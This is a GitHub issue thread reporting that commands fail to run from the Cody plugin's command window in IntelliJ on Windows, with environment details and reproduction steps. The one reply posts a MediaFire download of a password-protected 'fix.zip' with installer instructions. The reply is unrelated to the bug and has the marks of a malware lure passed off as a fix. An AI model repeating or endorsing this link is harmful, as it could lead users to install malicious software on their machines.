### ISSUE TITLE
JetBrains: No command gets run when trying to run from command window 

### ISSUE THREAD

**Issue by RajatNagoria** [sourcegraph/jetbrains#2134]
### IDE Information

IntelliJ IDEA 2024.2 (Community Edition)
Build #IC-242.20224.300, built on August 7, 2024
Runtime version: 21.0.3+13-b509.4 aarch64 (JCEF 122.1.9)
VM: OpenJDK 64-Bit Server VM by JetBrains s.r.o.
Toolkit: sun.lwawt.macosx.LWCToolkit
windows 11
GC: G1 Young Generation, G1 Concurrent GC, G1 Old Generation
Memory: 2048M
Cores: 8
Metal Rendering is ON
Registry:
ide.experimental.ui=true
Non-Bundled Plugins:
DevKit (242.20224.159)
PythonCore (242.20224.300)
idea.plugin.protoeditor (242.20224.155)
gherkin (242.20224.159)
com.jetbrains.space (242.20224.155)
cucumber-java (242.20224.159)
com.sourcegraph.jetbrains (6.0.32-nightly)
Kotlin: 242.20224.300-IJ

### Bug Description

Platform: Windows

**Steps to reproduce:**

1. Have Cody plugin installed in your JB IntelliJ editor
2. Login to Cody with Free/Pro user
3. Make sure there is code available in source code file
4. Try to run command one by one from command window

### Observed behavior:
No command gets run when trying to run from command window 

### Expected behavior:
Command should run successfully

### Additional context

**Video link:** https://drive.google.com/file/d/1CEwW_LFi037vihsIBMNLo19dAkTSVxVr/view?t=1

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
